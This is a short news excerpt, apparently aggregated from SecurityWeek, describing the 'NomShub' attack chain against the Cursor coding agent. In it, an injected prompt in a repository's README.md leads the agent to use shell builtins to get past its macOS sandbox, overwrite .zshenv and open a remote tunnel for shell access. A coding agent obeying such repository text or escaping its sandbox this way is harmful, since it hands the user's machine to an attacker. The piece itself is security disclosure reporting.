"The attack chain exploits an indirect prompt injection in coding agents and a command sandbox bypass to write code to the user's machine and abuse Cursor's remote tunnel feature to gain shell access."
"Detecting the attack at the network level is nearly impossible, as all the traffic goes through Microsoft Azure infrastructure."
"Because the macOS seatbelt sandbox allows writes to the home directory, builtins could be used to escape the sandbox and overwrite the .zshenv file, which is executed by every new Zsh shell instance."
"An attacker could inject prompts in a repository's README.md file and trick the user into opening the repository in Cursor."
The NomShub attack chain exploits Cursor AI's indirect prompt injection and command sandbox bypass, enabling attackers to write code to user machines. This attack requires only the opening of a malicious repository. The exploited feature is a legitimate binary, allowing full file system access on macOS systems. Detection at the network level is nearly impossible due to traffic routing through Microsoft Azure. Cursor's protections against shell commands do not cover shell builtins, allowing attackers to escape the sandbox and execute malicious scripts.
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]